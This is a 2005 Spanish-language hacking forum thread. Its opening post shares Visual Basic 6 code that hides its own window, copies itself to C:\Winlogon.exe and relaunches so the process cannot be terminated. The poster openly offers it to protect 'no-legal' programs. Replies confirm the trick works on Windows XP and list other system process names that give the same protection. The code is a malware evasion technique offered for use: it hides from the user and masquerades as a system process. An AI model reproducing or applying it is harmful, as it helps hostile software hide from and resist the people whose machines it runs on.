Proceso Protegido

Iniciado por NYlOn, 30 Septiembre 2005, 04:31 AM

0 Miembros y 1 Visitante están viendo este tema.

NYlOn

Bueng0 gente, les keria compartir un codigo cencillisimo que acabo de hacer y que me parecio muy util ;D
Este codigo iria en el Load del 1er from que se ejecuta, y lo que hace es copiar el ejecutable en otro directorio con el nombre 'Winlogon.exe' (con este nombre, el proceso no puede ser terminado ;)), luego se cierra y habre la nueva copia. De este modo nuestro programa 'no-legal' no puede ser terminado....
Esper0 q les sea de utilidad

Private Sub Form_Load()

    Me.Visible = False 'esconde el From de la pantalla
   
    If App.PrevInstance = True Then 'evita que se ejecute 2 veces
        End
    End If
   
    If App.EXEName <> "Winlogon" Then 'si el programa no se llama "Winlogon.exe" entonces
        FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Winlogon.exe" 'lo copiamos al disco 'C:' con ese nombre
        DoEvents
        Shell "C:\Winlogon.exe" 'y lo ejecutamos
        DoEvents
        End
    Else 'en cambio, si se llama Winlogon.exe
        'Ejecutamos el codigo normal de nuestro programa
    End If

End Sub


NOTA: si vas a probar este ejemplo en tu pc, te conviene dejar el From visible y con un boton para finalizar el programa, ya que de otro modo va a ser imposible terminarlo (RESET xD)

esper0 que les sirva, y si no c entiende alg0 posteen (pero me parece q esta bien clarito :P)

salu2 !!!

G0nz4

Alpha_

Hmm lo voy a probar.. de verdad que es interminable simplemente por llamarse WinLogon?

Me resulta muy raro, puesto que el tema de los privilegios es un poco más avanzado que un simple nombre.
Sí, soy un zorrino, y qué?

Slasher-K

Juaz, vaya seguridad de Windows. Copié el ejecutable del bloc de notas y le cambié el nombre a winlogon.exe, no lo deja eliminar de la lista de procesos  :-X

Cada día me sorprendo más de este sistema xD.
Gracias por el aporte NYlOn.

Saludos.



A la reina de las profundidades que cuida los pasos de una sombra en la noche :*

yeikos

Esto no es nuevo, existe otros procesos de windows en los que sucede lo mismo, así como lsass.exe .

NYlOn

#4
De nada :)
Es un placer aportar algo a esta comunidad que tanto me enseña ^^

ak algunos otros proceso que no pueden ser terminados:
-Csrss.exe
-Winlogon.exe
-Lsass.exe
-Smss.exe
-Services.exe
y deve haber un par mas... pero son to2 los q recuerdo xD

------------------------------------

Citarel tema de los privilegios es un poco más avanzado que un simple nombre.
-No en Win XP ;D

un salud0

G0nz4

Numeros

#5
 :D Buenísimo!! tremendo aporte NYlOn.. ahora si que estas hecho un hacker de alta peligrosidad ;D

CitarJuaz, vaya seguridad de Windows. Copié el ejecutable del bloc de notas y le cambié el nombre a winlogon.exe, no lo deja eliminar de la lista de procesos 

Cada día me sorprendo más de este sistema xD.


Bueno mi modesta opinión debian haber pensado los de microsoft en no permitir que dos procesos de igual nombre esten corriendo al mismo tiempo, pero en fín, a lo mejor es así por razones que ignoro.. solo estoy conjeturando..

Salu2

Ch3ck

Bien por el aporte NYLOn, pero me sorprende un poco que casi nadie lo sepa (entre ellos estaba yo) puesto que ya tu habias hablado sobre esto en algunos post ejem: http://foro.elhacker.net/index.php/topic,88232.0.html  ;D


NYlOn

No mucha gente lee los posts enteros (me incluyo xDDD)

salu2

_Sergi_

Joder estoy asombrado

Buen trabajo NYlOn.
Proyecto de Ingeniero

NYlOn